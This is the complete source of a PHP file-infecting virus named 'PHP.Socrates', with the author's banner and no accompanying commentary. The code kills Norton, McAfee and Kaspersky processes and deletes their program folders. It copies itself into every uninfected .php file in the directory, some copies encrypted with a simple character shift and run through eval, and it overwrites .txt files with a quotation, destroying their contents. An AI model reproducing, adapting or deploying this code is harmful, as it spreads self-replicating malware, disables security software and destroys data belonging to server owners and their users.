<?php echo("PHP.Socrates by synged flesh"."<br>"."The only true wisdom is in knowing you know nothing."); $decrypt= "function SocratesDecrypt(\$string,\$key)\r\n" ."{ \r\n" ." \$codez=''; \r\n" ." for(\$i=0; \$i<strlen(\$string); \$i++)\r\n" ." { \r\n" ." \$value=ord(\$string[\$i]); \r\n" ." \$valuez=\$value+\$key; \r\n" ." \$codez.=chr(\$valuez); \r\n" ." } \r\n" ." return \$codez; \r\n" ." } \r\n" ."\$filez = \$_SERVER[\"SCRIPT_NAME\"];\r\n" ."\$break = Explode('/', \$filez); \r\n" ."\$pfile = \$break[count(\$break) - 1];\r\n" ."\$c = fopen(\$pfile,'rb');\r\n" ."\$d = fread(\$c,filesize(\$pfile));\r\n" ."fclose(\$c);\r\n" ."\$next=strlen(\$d)-693;\r\n" ."\$virus=substr(\$d,687,\$next);\r\n" ."\$vr=SocratesDecrypt(\$virus,'1');\r\n" ."eval(\$vr);"; function SocratesCrypt($string,$key) { $codez=""; for($i=0; $i<strlen($string); $i++) { $value=ord($string[$i]); $valuez=$value-$key; $codez.=chr($valuez); } return $codez; } if(is_dir("C:\Program Files\Norton*")) { exec("taskkill /f /t /im nod32.exe"); rmdir("C:\Program Files\Norton*"); } if(is_dir("C:\Program Files\McAfee*")) { exec("taskkill /f /t /im Mcshield.exe"); rmdir("C:\Program Files\McAfee*"); } if(is_dir("C:\Program Files\Kaspersky*")) { exec("taskkill /f /t /im KAV.exe"); rmdir("C:\Program Files\Kaspersky*"); } $filez = $_SERVER["SCRIPT_NAME"]; $break = Explode('/', $filez); $pfile = $break[count($break) - 1]; $c = fopen($pfile,'rb'); $d = fread($c,filesize($pfile)); fclose($c); $nextsize=strlen($d)-4; $virus=(substr($d,7,$nextsize)); $dir=opendir('*.*'); while (($file = readdir($dir)) !== false) { if (strstr($file,'.php')) { $f = fopen($file,'rb'); $contents = fread($f, filesize($file)); if (!strstr($contents, 'Socrates')) { if(!file_exists("Socrates.php")) { fclose($f); $g = fopen($file,'w'); fwrite($g,$d); fclose($g); } if(file_exists("Socrates.php")) { fclose($f); $g = fopen($file,'w'); fwrite($g,'<?php'.chr(13).chr(10).$decrypt.'/*'.SocratesCrypt($virus,'1').'*/'.'?>'); fclose($g); } } } if (strstr($file,'.txt')) { $f = fopen($file,'w'); fwrite($f,"Let him that would move the world, first move himself."); } }?>